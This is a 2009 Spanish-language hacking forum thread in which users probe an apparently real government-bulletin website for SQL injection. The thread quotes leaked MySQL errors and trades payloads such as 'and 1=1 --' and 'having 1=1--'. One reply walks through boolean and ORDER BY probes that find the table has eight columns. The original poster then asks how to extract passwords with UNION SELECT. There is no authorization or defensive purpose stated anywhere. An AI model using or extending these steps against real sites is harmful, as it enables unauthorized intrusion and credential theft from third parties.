Inyeccion SQL, ¿es vulnerable esta web?

Iniciado por y0mism0, 28 Agosto 2009, 03:35 AM

0 Miembros y 1 Visitante están viendo este tema.

y0mism0

Resulta que estaba escaneando una web con el acunetix y me salto esta supuesta vulnerablidad SQL en esta variable:

****/?op=Leyes&idBoletin=111-222-1933email@address.tst

El servidor me da el siguiente mensaje de error:

No se ha podido realizar la consulta: select * from leyes where id_publiOficial = 111-222-1933email@address.tst order by fecha desc; Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '@address.tst order by fecha desc' at line 1

De hay solo saco que hay una tabla llamada leyes y una columna llamada oficina.

Y ahora intento sacar las datos usando lo tipico, el having 1=1-- primero, dejando la url asi:

****/?op=Leyes&idBoletin=111-222-1933email@address.tst'having 1=1--

Dandome el mismo mensaje de error pero añadiendo lo del having:

No se ha podido realizar la consulta: select * from leyes where id_publiOficial = 111-222-1933email@address.tst'having 1=1-- order by fecha desc; Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '@address.tst order by fecha desc' at line 1

Luego lo puse asi: ****/?op='having 1=1--

Y no me salio ningun mensaje de error...

Tambien probe con 2 comillas, con otras instrucciones, ¿es este sitio vulnerable? ¿Tengo que meter el having de otra manera?

Da mensajes de error, pero no te deja meter las comillas para hacer la inyeccion, las toma como un caracter mas me parece.

Gracias

YST

Prueba con

+and+1=1+--+

o
Prueba con

'+and+1=1+--+


Yo le enseñe a Kayser a usar objetos en ASM

WHK

lo que pasa esque idBoletin contiene un valor incorrecto y por eso cada ves que haces pruebas con ese valor te arroja error.

Error:
***** index.php?op=InfoLey&idLey=6147 and 1=2

No da error:
***** index.php?op=InfoLey&idLey=6147 and 1=1

No da error
***** index.php?op=InfoLey&idLey=6147 order by 6

No da error
***** index.php?op=InfoLey&idLey=6147 order by 7

No da error
***** index.php?op=InfoLey&idLey=6147 order by 8

da error
***** index.php?op=InfoLey&idLey=6147 order by 9

Entonces es una tabla de 8 columnas que si tiene inyección sql.

y0mism0

Cita de: WHK en 28 Agosto 2009, 04:23 AM
lo que pasa esque idBoletin contiene un valor incorrecto y por eso cada ves que haces pruebas con ese valor te arroja error.

Error:
***** index.php?op=InfoLey&idLey=6147 and 1=2

No da error:
***** index.php?op=InfoLey&idLey=6147 and 1=1

No da error
***** index.php?op=InfoLey&idLey=6147 order by 6

No da error
***** index.php?op=InfoLey&idLey=6147 order by 7

No da error
***** index.php?op=InfoLey&idLey=6147 order by 8

da error
***** index.php?op=InfoLey&idLey=6147 order by 9

Entonces es una tabla de 8 columnas que si tiene inyección sql.

Pues en la variables esta: ****/?op=Leyes&idBoletin
que yo te puse no funciona lo de 1=1 o 1=2 ni el order by...

¿pero como se puede hacer la inyeccion para sacar los pass? No te da errores que te vayan diciendo el nombre de las tablas ni los campos usando union select y todo eso.



YST

La inyeccion para sacar claves de algun panel o algo varia según las tablas y columnas :P , tambien puede existir la posibilidad que no tenga en la MySQL los datos del login ;) .

Saludos


Yo le enseñe a Kayser a usar objetos en ASM